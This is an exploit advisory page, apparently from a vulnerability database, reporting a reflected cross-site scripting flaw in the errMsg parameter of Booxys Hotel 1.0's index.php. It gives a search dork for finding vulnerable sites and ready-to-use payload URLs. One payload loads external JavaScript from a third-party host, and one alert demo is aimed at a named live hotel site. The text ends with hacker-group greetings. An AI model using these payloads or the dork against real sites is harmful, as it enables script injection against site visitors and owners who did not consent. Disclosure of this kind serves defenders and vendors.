Booxys Hotel 1.0 Cross Site Scripting

2011.06.10
Credit: Net.Edit0r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#(+)Exploit Title: booxys Hotel [index.php] Cross site scripting Vulnerability #(+)Author : Net.Edit0r #(+)Software Link : http://www.booxys.com/ #(+) E-mail : Black.hat.tm@Gmail.com & Net.Edit0r@att.net #(+) dork : inurl:"index.php?errMsg=" #(+) Versian : [1.0] #(+) Category : Web Apps [XSS] #(+) Platform : Tested on: linux ____________________________________________________________________ ____________________________________________________________________ The security problem in the file "index.php" has been created. You can disable this security problem Plagn take it away. [~] Vulnerable File : # [+]http://localhost.com/de/index.php?errMsg=[XSS] [~] Cross-site scripting Vulnerability # [+]/de/index.php?errMsg=[XSS] # [+]http://localhost.com/de/index.php?errMsg=<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> [~] Demo : http://www.hotel-board.com/de/index.php?errMsg=<script>alert(1);</script> ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)IRANIAN Young HackerZ # Persian Gulf (+)#BHG Member : & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly (+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ M4hd1 ~ Mikili ~ 4min (+)Gr33ts to : Black-Hg.Org ~ Pentesters.ir & All Iranian HackerZ ########################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top